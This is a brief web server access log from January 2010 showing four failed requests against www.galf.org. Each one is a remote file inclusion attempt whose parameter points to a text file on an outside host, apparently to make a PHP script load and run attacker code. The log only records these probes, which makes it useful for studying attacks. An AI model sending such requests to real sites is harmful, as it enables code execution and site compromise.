81.12.13.152 - - [10/Jan/2010:23:58:44 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:58:44 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:31 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:59:31 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
